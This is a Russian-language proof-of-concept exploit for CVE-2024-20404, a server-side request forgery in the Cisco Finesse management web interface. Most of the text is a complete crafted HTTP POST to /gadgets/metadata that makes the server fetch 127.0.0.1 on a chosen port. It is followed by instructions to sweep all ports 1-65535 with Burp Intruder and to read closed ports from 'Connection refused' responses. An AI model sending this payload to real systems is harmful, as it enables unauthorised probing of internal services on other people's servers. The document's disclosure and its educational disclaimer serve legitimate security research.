
Эксплойт-доказательство концепции для CVE-2024-20404, демонстрирующий SSRF в веб-интерфейсе управления Cisco Finesse для перечисления локальных служб путём отправки специально сформированных HTTP-запросов.
Уязвимость в веб-интерфейсе управления Cisco Finesse может позволить неаутентифицированному удалённому злоумышленнику провести SSRF-атаку на уязвимую систему.
Эта уязвимость вызвана недостаточной проверкой вводимых пользователем данных для определенных HTTP-запросов, отправляемых на уязвимую систему. Злоумышленник может воспользоваться этой уязвимостью, отправив специально сформированный HTTP-запрос на целевое устройство. Успешная эксплуатация может позволить злоумышленнику получить ограниченную конфиденциальную информацию о службах, связанных с уязвимым устройством.
<target> на ваш.POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

Используйте Intruder в Burp Suite для сканирования всех открытых портов на веб-сервере управления Cisco Finesse, изменяя номер порта от 1 до 65535.
На закрытых портах вы увидите ответ "Connection refused".


Это всего лишь доказательство концепции (PoC), демонстрирующее, что веб-интерфейс управления Cisco Finesse уязвим для подделки серверных запросов (SSRF), и данный PoC предназначен только для образовательных целей. Используйте его ответственно и только на системах, на которые получено явное разрешение на тестирование. Неправильное использование этого PoC может привести к серьезным последствиям.